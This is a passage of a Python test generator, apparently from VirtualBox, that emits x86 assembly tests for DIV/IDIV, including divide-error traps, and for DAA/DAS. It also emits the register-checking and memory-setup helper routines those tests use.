% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,
iQuotient & UINT8_MAX, iQuotient, iReminder & UINT8_MAX, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateStandardTests(self, oGen):
""" Generates test that causes no exceptions. """
# Parameters.
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if True:
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
for iOp2 in oOp2Range:
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if iOp2 == X86_GREG_xAX or (cbEffOp > 1 and iOp2 == X86_GREG_xDX):
continue; # Will overflow or be too complicated to get right.
if cbEffOp == 1 and iOp2 == (16 if oGen.oTarget.is64Bit() else 4):
continue; # Avoid dividing by AH, same reasons as above.
for iDividend, iDivisor in self.generateInputsNoXcpt(cbEffOp, iOp2 == iLongOp2):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneStdTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneStdTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
## Memory test.
#if False:
# for cAddrBits in oGen.oTarget.getAddrModes():
# for cbEffOp in self.acbOpVars:
# if cbEffOp > cbMaxOp:
# continue;
#
# auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
# for _ in oGen.oModRmRange:
# oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
# if oGen.iModRm != 4 or cAddrBits == 16:
# for uInput in auInputs:
# oGen.newSubTest();
# if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
# continue; # Don't know the high bit of the address ending up the result - skip it for now.
# uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
# self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
# oGen.iModReg, oGen.iModRm, uInput, uResult);
# else:
# # SIB - currently only short list of inputs or things may get seriously out of hand.
# self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
#
return True;
def generateInputsXcpt(self, cbEffOp, fLong = False):
"""
Generate inputs for cbEffOp that will overflow or underflow.
Returns a list of pairs, dividen + divisor.
"""
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, True);
auRet.extend([[0, 0], [1, 0], [ uStep * uStep / 2 - 1, 0]]);
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
uDividend = randSxx(cbEffOp * 16);
if uDivisor >= uStep or uDivisor < -uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if (uResult <= uStep and uResult >= 0) or (uResult >= -uStep and uResult < 0):
continue; # exclude difficulties
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
uDividend = randUxx(cbEffOp * 16);
if uDivisor >= uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if uResult < uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneDivideErrorTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test that causes #DE. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full with unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX],));
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneDivideErrorTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test that causes #DE (8-bit). """
if not oGen.oTarget.is64Bit() and iOp2 == 4: # Avoid AH.
iOp2 = 5;
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full with unsigned
uOp2Val = iDivisor & UINT8_MAX;
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.write(' push sAX\n');
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateDivideErrorTests(self, oGen):
""" Generate divide error tests (raises X86_XCPT_DE). """
oGen.write('%ifdef VBINSTST_CAN_DO_TRAPS\n');
# We do one register variation here, assuming the standard test has got them covered.
# Register tests
if True:
iOp2 = oGen.oTarget.randGRegNoSp();
while iOp2 == X86_GREG_xAX or iOp2 == X86_GREG_xDX:
iOp2 = oGen.oTarget.randGRegNoSp();
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u iOp2=%u\n' % (cbEffOp, iOp2,));
for iDividend, iDivisor in self.generateInputsXcpt(cbEffOp, fLong = not oGen.isTiny()):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneDivideErrorTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneDivideErrorTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
oGen.write('%endif ; VBINSTST_CAN_DO_TRAPS\n');
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
#oGen.write(' int3\n');
self.generateStandardTests(oGen);
self.generateDivideErrorTests(oGen);
#oGen.write(' int3\n');
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_DaaDas(InstrTestBase):
""" Tests the DAA and DAS instructions. """
def __init__(self, fIsDas):
InstrTestBase.__init__(self, 'das' if fIsDas else 'daa');
self.fIsDas = fIsDas;
def isApplicable(self, oGen):
return not oGen.oTarget.is64Bit();
def generateTest(self, oGen, sTestFnName):
if self.fIsDas: from itgTableDas import g_aItgDasResults as aItgResults;
else: from itgTableDaa import g_aItgDaaResults as aItgResults;
cMax = len(aItgResults);
if oGen.isTiny():
cMax = 64;
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
oGen.write(' xor ebx, ebx\n');
oGen.write('.das_loop:\n');
# Save the loop variable so we can load known values.
oGen.write(' push ebx\n');
oGen.newSubTestEx('ebx');
# Push the results.
oGen.write(' movzx eax, byte [.abAlResults + ebx]\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' movzx eax, byte [.aFlagsResults + ebx]\n');
oGen.write(' push eax\n');
# Calc and push the inputs.
oGen.write(' mov eax, ebx\n');
oGen.write(' shr eax, 2\n');
oGen.write(' and eax, 0ffh\n');
oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
oGen.write(' push eax\n');
oGen.write(' pushfd\n')
oGen.write(' and dword [xSP], ~(X86_EFL_CF | X86_EFL_AF)\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, 2\n');
oGen.write(' shl al, X86_EFL_AF_BIT - 1\n');
oGen.write(' or [xSP], al\n');
oGen.write(' mov al, bl\n');
oGen.write(' and al, X86_EFL_CF\n');
oGen.write(' or [xSP], al\n');
# Load register values and do the test.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' popfd\n');
oGen.write(' pop eax\n');
if self.fIsDas:
oGen.write(' das\n');
else:
oGen.write(' daa\n');
# Verify the results.
fFlagsToCheck = X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_SF | X86_EFL_ZF;
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needFlagsGRegChecker(fFlagsToCheck, X86_GREG_xAX),));
# Restore the loop variable and advance.
oGen.write(' pop ebx\n');
oGen.write(' inc ebx\n');
oGen.write(' cmp ebx, %#x\n' % (cMax,));
oGen.write(' jb .das_loop\n');
oGen.write(' ret\n');
oGen.write('.abAlResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][0],));
oGen.write('.aFlagsResults:\n');
for i in range(cMax):
oGen.write(' db %#x\n' % (aItgResults[i][1],));
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
##
# Instruction Tests.
#
g_aoInstructionTests = [
InstrTest_Mov_Gv_Ev(),
InstrTest_MovSxD_Gv_Ev(),
InstrTest_DivIDiv(fIsIDiv = False),
InstrTest_DivIDiv(fIsIDiv = True),
InstrTest_DaaDas(fIsDas = False),
InstrTest_DaaDas(fIsDas = True),
];
class InstructionTestGen(object): # pylint: disable=R0902
"""
Instruction Test Generator.
"""
## @name Test size
## @{
ksTestSize_Large = 'large';
ksTestSize_Medium = 'medium';
ksTestSize_Tiny = 'tiny';
## @}
kasTestSizes = ( ksTestSize_Large, ksTestSize_Medium, ksTestSize_Tiny );
## The prefix for the checker functions.
ksCheckerPrefix = 'Common_Check_'
def __init__(self, oOptions):
self.oOptions = oOptions;
self.oTarget = g_dTargetEnvs[oOptions.sTargetEnv];
# Calculate the number of output files.
self.cFiles = 1;
if len(g_aoInstructionTests) > self.oOptions.cInstrPerFile:
self.cFiles = len(g_aoInstructionTests) / self.oOptions.cInstrPerFile;
if self.cFiles * self.oOptions.cInstrPerFile < len(g_aoInstructionTests):
self.cFiles += 1;
# Fix the known register values.
self.au64Regs = randUxxList(64, 16);
self.au32Regs = [(self.au64Regs[i] & UINT32_MAX) for i in range(8)];
self.au16Regs = [(self.au64Regs[i] & UINT16_MAX) for i in range(8)];
self.auRegValues = self.au64Regs if self.oTarget.is64Bit() else self.au32Regs;
# Declare state variables used while generating.
self.oFile = sys.stderr;
self.iFile = -1;
self.sFile = '';
self._dCheckFns = dict();
self._dMemSetupFns = dict();
self._d64BitConsts = dict();
# State variables used while generating test convenientely placed here (lazy bird)...
self.iModReg = 0;
self.iModRm = 0;
self.iSibBaseReg = 0;
self.iSibIndexReg = 0;
self.iSibScale = 1;
if self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
self._oModRegRange = range(2);
self._oModRegRange8 = range(2);
self.oModRmRange = range(2);
self.cSibBasePerRun = 1;
self._cSibIndexPerRun = 2;
self.oSibScaleRange = range(1);
elif self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
self._oModRegRange = range( 5 if self.oTarget.is64Bit() else 4);
self._oModRegRange8 = range( 6 if self.oTarget.is64Bit() else 4);
self.oModRmRange = range(5);
self.cSibBasePerRun = 5;
self._cSibIndexPerRun = 4
self.oSibScaleRange = range(2);
else:
self._oModRegRange = range(16 if self.oTarget.is64Bit() else 8);
self._oModRegRange8 = range(20 if self.oTarget.is64Bit() else 8);
self.oModRmRange = range(16 if self.oTarget.is64Bit() else 8);
self.cSibBasePerRun = 8;
self._cSibIndexPerRun = 9;
self.oSibScaleRange = range(4);
self.iSibIndexRange = 0;
#
# Methods used by instruction tests.
#
def write(self, sText):
""" Writes to the current output file. """
return self.oFile.write(unicode(sText));
def writeln(self, sText):
""" Writes a line to the current output file. """
self.write(sText);
return self.write('\n');
def writeInstrBytes(self, abInstr):
"""
Emits an instruction given as a sequence of bytes values.
"""
self.write(' db %#04x' % (abInstr[0],));
for i in range(1, len(abInstr)):
self.write(', %#04x' % (abInstr[i],));
return self.write('\n');
def newSubTest(self):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], __LINE__\n');
return True;
def newSubTestEx(self, sIndicator):
"""
Indicates that a new subtest has started.
"""
self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], %s\n' % (sIndicator, ));
return True;
def needGRegChecker(self, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given register checker function, returning its label.
"""
if iReg2 is not None:
if iReg3 is not None:
sName = '%s_%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2], self.oTarget.asGRegs[iReg3],);
else:
sName = '%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2],);
else:
sName = '%s' % (self.oTarget.asGRegs[iReg1],);
assert iReg3 is None;
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needFlagsGRegChecker(self, fFlagsToCheck, iReg1, iReg2 = None, iReg3 = None):
"""
Records the need for a given rFLAGS + register checker function, returning its label.
"""
sWorkerName = self.needGRegChecker(iReg1, iReg2, iReg3);
sName = 'eflags_%#x_%s' % (fFlagsToCheck, sWorkerName[len(self.ksCheckerPrefix):]);
if sName in self._dCheckFns:
self._dCheckFns[sName] += 1;
else:
self._dCheckFns[sName] = 1;
return self.ksCheckerPrefix + sName;
def needGRegMemSetup(self, cAddrBits, cbEffOp, iBaseReg = None, offDisp = None, iIndexReg = None, iScale = 1):
"""
Records the need for a given register checker function, returning its label.
"""
assert cAddrBits in [64, 32, 16];
assert cbEffOp in [8, 4, 2, 1];
assert iScale in [1, 2, 4, 8];
sName = '%ubit_U%u' % (cAddrBits, cbEffOp * 8,);
if iBaseReg is not None:
sName += '_%s' % (gregName(iBaseReg, cAddrBits),);
sName += '_x%u' % (iScale,);
if iIndexReg is not None:
sName += '_%s' % (gregName(iIndexReg, cAddrBits),);
if offDisp is not None:
sName += '_%#010x' % (offDisp & UINT32_MAX, );
if sName in self._dMemSetupFns:
self._dMemSetupFns[sName] += 1;
else:
self._dMemSetupFns[sName] = 1;
return 'Common_MemSetup_' + sName;
def need64BitConstant(self, uVal):
"""
Records the need for a 64-bit constant, returning its label.
These constants are pooled to attempt reduce the size of the whole thing.
"""
assert uVal >= 0 and uVal <= UINT64_MAX;
if uVal in self._d64BitConsts:
self._d64BitConsts[uVal] += 1;
else:
self._d64BitConsts[uVal] = 1;
return 'g_u64Const_0x%016x' % (uVal, );
def pushConst(self, uResult):
"""
Emits a push constant value, taking care of high values on 64-bit hosts.
"""
if self.oTarget.is64Bit() and uResult >= 0x80000000:
self.write(' push qword [%s wrt rip]\n' % (self.need64BitConstant(uResult),));
else:
self.write(' push dword 0x%x\n' % (uResult,));
return True;
def getDispForMod(self, iMod, cbAlignment = 1):
"""
Get a set of address dispositions for a given addressing mode.
The alignment restriction is for SIB scaling.
"""
assert cbAlignment in [1, 2, 4, 8];
if iMod == 0:
aoffDisp = [ None, ];
elif iMod == 1:
aoffDisp = [ 127 & ~(cbAlignment - 1), -128 ];
elif iMod == 2:
aoffDisp = [ 2147483647 & ~(cbAlignment - 1), -2147483648 ];
else: assert False;
return aoffDisp;
def getModRegRange(self, cbEffOp):
"""
The Mod R/M register range varies with the effective operand size, for
8-bit registers we have 4 more.
"""
if cbEffOp == 1:
return self._oModRegRange8;
return self._oModRegRange;
def getSibIndexPerRun(self):
"""
We vary the SIB index test range a little to try cover more operand
combinations and avoid repeating the same ones.
"""
self.iSibIndexRange += 1;
self.iSibIndexRange %= 3;
if self.iSibIndexRange == 0:
return self._cSibIndexPerRun - 1;
return self._cSibIndexPerRun;
def isTiny(self):
""" Checks if we're in tiny mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny;
def isMedium(self):
""" Checks if we're in medium mode."""
return self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium;
#
# Forwarding calls for oTarget to shorted typing and lessen the attacks
# on the right margin.
#
def gregNameBits(self, iReg, cBitsWide):
""" Target: Get the name of a general register for the given size (in bits). """
return self.oTarget.gregNameBits(iReg, cBitsWide);
def gregNameBytes(self, iReg, cbWide):
""" Target: Get the name of a general register for the given size (in bytes). """
return self.oTarget.gregNameBytes(iReg, cbWide);
def is64Bit(self):
""" Target: Is the target 64-bit? """
return self.oTarget.is64Bit();
#
# Internal machinery.
#
def _randInitIndexes(self):
"""
Initializes the Mod R/M and SIB state index with random numbers prior
to generating a test.
Note! As with all other randomness and variations we do, we cannot
test all combinations for each and every instruction so we try
get coverage over time.
"""
self.iModReg = randU8();
self.iModRm = randU8();
self.iSibBaseReg = randU8();
self.iSibIndexReg = randU8();
self.iSibScale = 1 << (randU8() & 3);
self.iSibIndexRange = randU8();
return True;
def _calcTestFunctionName(self, oInstrTest, iInstrTest):
"""
Calc a test function name for the given instruction test.
"""
sName = 'TestInstr%03u_%s' % (iInstrTest, oInstrTest.sName);
return sName.replace(',', '_').replace(' ', '_').replace('%', '_');
def _generateFileHeader(self, ):
"""
Writes the file header.
Raises exception on trouble.
"""
self.write('; $Id: InstructionTestGen.py $\n'
';; @file %s\n'
'; Autogenerate by %s %s. DO NOT EDIT\n'
';\n'
'\n'
';\n'
'; Headers\n'
';\n'
'%%include "env-%s.mac"\n'
% ( os.path.basename(self.sFile),
os.path.basename(__file__), __version__[11:-1],
self.oTarget.sName,
) );
# Target environment specific init stuff.
#
# Global variables.
#
self.write('\n\n'
';\n'
'; Globals\n'
';\n');
self.write('VBINSTST_BEGINDATA\n'
'VBINSTST_GLOBALNAME_EX g_pvLow16Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvLow32Mem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_pvMem4K, data hidden\n'
' dq 0\n'
'VBINSTST_GLOBALNAME_EX g_uVBInsTstSubTestIndicator, data hidden\n'
' dd 0\n'
'%ifdef VBINSTST_CAN_DO_TRAPS\n'
'VBINSTST_TRAP_RECS_BEGIN\n'
'%endif\n'
'VBINSTST_BEGINCODE\n'
);
self.write('%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64)):
self.write('g_u64KnownValue_%s: dq 0x%x\n' % (g_asGRegs64[i], self.au64Regs[i]));
self.write('%endif\n\n')
#
# Common functions.
#
# Loading common values.
self.write('\n\n'
'VBINSTST_BEGINPROC Common_LoadKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs64NoSp[i], self.au64Regs[i],));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' mov %s, 0x%x\n' % (g_asGRegs32NoSp[i], self.au32Regs[i],));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_LoadKnownValues\n'
'\n');
self.write('VBINSTST_BEGINPROC Common_CheckKnownValues\n'
'%ifdef RT_ARCH_AMD64\n');
for i in range(len(g_asGRegs64NoSp)):
if g_asGRegs64NoSp[i]:
self.write(' cmp %s, [g_u64KnownValue_%s wrt rip]\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push qword [g_u64KnownValue_%s wrt rip] ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i, i, g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i,));
self.write('%else\n');
for i in range(8):
if g_asGRegs32NoSp[i]:
self.write(' cmp %s, 0x%x\n'
' je .ok_%u\n'
' push %u ; register number\n'
' push %s ; actual\n'
' push dword 0x%x ; expected\n'
' call VBINSTST_NAME(Common_BadValue)\n'
'.ok_%u:\n'
% ( g_asGRegs32NoSp[i], self.au32Regs[i], i, i, g_asGRegs32NoSp[i], self.au32Regs[i], i,));
self.write('%endif\n'
' ret\n'
'VBINSTST_ENDPROC Common_CheckKnownValues\n'
'\n');
return True;
def _generateMemSetupFunctions(self): # pylint: disable=R0915
"""
Generates the memory setup functions.
"""
cDefAddrBits = self.oTarget.getDefAddrBits();
for sName in self._dMemSetupFns:
# Unpack it.
asParams = sName.split('_');
cAddrBits = int(asParams[0][:-3]); assert asParams[0][-3:] == 'bit';
cEffOpBits = int(asParams[1][1:]); assert asParams[1][0] == 'U';
if cAddrBits == 64: asAddrGRegs = g_asGRegs64;
elif cAddrBits == 32: asAddrGRegs = g_asGRegs32;
else: asAddrGRegs = g_asGRegs16;
i = 2;
iBaseReg = None;
sBaseReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sBaseReg = asParams[i];
iBaseReg = asAddrGRegs.index(sBaseReg);
i += 1
assert i < len(asParams); assert asParams[i][0] == 'x';
iScale = iScale = int(asParams[i][1:]); assert iScale in [1, 2, 4, 8], '%u %s' % (iScale, sName);
i += 1;
sIndexReg = None;
iIndexReg = None;
if i < len(asParams) and asParams[i] in asAddrGRegs:
sIndexReg = asParams[i];
iIndexReg = asAddrGRegs.index(sIndexReg);
i += 1;
u32Disp = None;
if i < len(asParams) and len(asParams[i]) == 10:
u32Disp = long(asParams[i], 16);
i += 1;
assert i == len(asParams), 'i=%d len=%d len[i]=%d (%s)' % (i, len(asParams), len(asParams[i]), asParams[i],);
assert iScale == 1 or iIndexReg is not None;
# Find a temporary register.
iTmpReg1 = X86_GREG_xCX;
while iTmpReg1 in [iBaseReg, iIndexReg]:
iTmpReg1 += 1;
# Prologue.
self.write('\n\n'
'; cAddrBits=%s cEffOpBits=%s iBaseReg=%s u32Disp=%s iIndexReg=%s iScale=%s\n'
'VBINSTST_BEGINPROC Common_MemSetup_%s\n'
' MY_PUSH_FLAGS\n'
' push %s\n'
% ( cAddrBits, cEffOpBits, iBaseReg, u32Disp, iIndexReg, iScale,
sName, self.oTarget.asGRegs[iTmpReg1], ));
# Figure out what to use.
if cEffOpBits == 64:
sTmpReg1 = g_asGRegs64[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u64Data)';
elif cEffOpBits == 32:
sTmpReg1 = g_asGRegs32[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u32Data)';
elif cEffOpBits == 16:
sTmpReg1 = g_asGRegs16[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u16Data)';
else:
assert cEffOpBits == 8; assert iTmpReg1 < 4;
sTmpReg1 = g_asGRegs8Rex[iTmpReg1];
sDataVar = 'VBINSTST_NAME(g_u8Data)';
# Special case: reg + reg * [2,4,8]
if iBaseReg == iIndexReg and iBaseReg is not None and iScale != 1:
iTmpReg2 = X86_GREG_xBP;
while iTmpReg2 in [iBaseReg, iIndexReg, iTmpReg1]:
iTmpReg2 += 1;
sTmpReg2 = self.gregNameBits(iTmpReg2, cAddrBits);
self.write(' push sAX\n'
' push %s\n'
' push sDX\n'
% (self.oTarget.asGRegs[iTmpReg2],));
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sTmpReg2,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sTmpReg2,));
self.write(' add %s, 0x200\n' % (sTmpReg2,));
self.write(' mov %s, %s\n' % (self.gregNameBits(X86_GREG_xAX, cAddrBits), sTmpReg2,));
if u32Disp is not None:
self.write(' sub %s, %d\n'
% ( self.gregNameBits(X86_GREG_xAX, cAddrBits), convU32ToSigned(u32Disp), ));
self.write(' xor edx, edx\n'
'%if xCB == 2\n'
' push 0\n'
'%endif\n');
self.write(' push %u\n' % (iScale + 1,));
self.write(' div %s [xSP]\n' % ('qword' if cAddrBits == 64 else 'dword',));
self.write(' sub %s, %s\n' % (sTmpReg2, self.gregNameBits(X86_GREG_xDX, cAddrBits),));
self.write(' pop sDX\n'
' pop sDX\n'); # sTmpReg2 is eff address; sAX is sIndexReg value.
# Note! sTmpReg1 can be xDX and that's no problem now.
self.write(' mov %s, [xSP + sCB*3 + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
self.write(' mov [%s], %s\n' % (sTmpReg2, sTmpReg1,)); # Value in place.
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg2],));
if iBaseReg == X86_GREG_xAX:
self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg1],));
else:
self.write(' mov %s, %s\n' % (sBaseReg, self.gregNameBits(X86_GREG_xAX, cAddrBits),));
self.write(' pop sAX\n');
else:
# Load the value and mem address, storing the value there.
# Note! ASSUMES that the scale and disposition works fine together.
sAddrReg = sBaseReg if sBaseReg is not None else sIndexReg;
self.write(' mov %s, [xSP + sCB + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
if cAddrBits >= cDefAddrBits:
self.write(' mov [%s xWrtRIP], %s\n' % (sDataVar, sTmpReg1,));
self.write(' lea %s, [%s xWrtRIP]\n' % (sAddrReg, sDataVar,));
else:
if cAddrBits == 16:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sAddrReg,));
else:
self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sAddrReg,));
self.write(' add %s, %s\n' % (sAddrReg, (randU16() << cEffOpBits) & 0xfff, ));
self.write(' mov [%s], %s\n' % (sAddrReg, sTmpReg1, ));
# Adjust for disposition and scaling.
if u32Disp is not None:
self.write(' sub %s, %d\n' % ( sAddrReg, convU32ToSigned(u32Disp), ));
if iIndexReg is not None:
if iBaseReg == iIndexReg:
assert iScale == 1;
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif sBaseReg is not None:
uIdxRegVal = randUxx(cAddrBits);
if cAddrBits == 64:
self.write(' mov %s, %u\n'
' sub %s, %s\n'
' mov %s, %u\n'
% ( sIndexReg, (uIdxRegVal * iScale) & UINT64_MAX,
sBaseReg, sIndexReg,
sIndexReg, uIdxRegVal, ));
else:
assert cAddrBits == 32;
self.write(' mov %s, %u\n'
' sub %s, %#06x\n'
% ( sIndexReg, uIdxRegVal, sBaseReg, (uIdxRegVal * iScale) & UINT32_MAX, ));
elif iScale == 2:
assert u32Disp is None or (u32Disp & 1) == 0;
self.write(' shr %s, 1\n' % (sIndexReg,));
elif iScale == 4:
assert u32Disp is None or (u32Disp & 3) == 0;
self.write(' shr %s, 2\n' % (sIndexReg,));
elif iScale == 8:
assert u32Disp is None or (u32Disp & 7) == 0;
self.write(' shr %s, 3\n' % (sIndexReg,));
else:
assert iScale == 1;
# Set upper bits that's supposed to be unused.
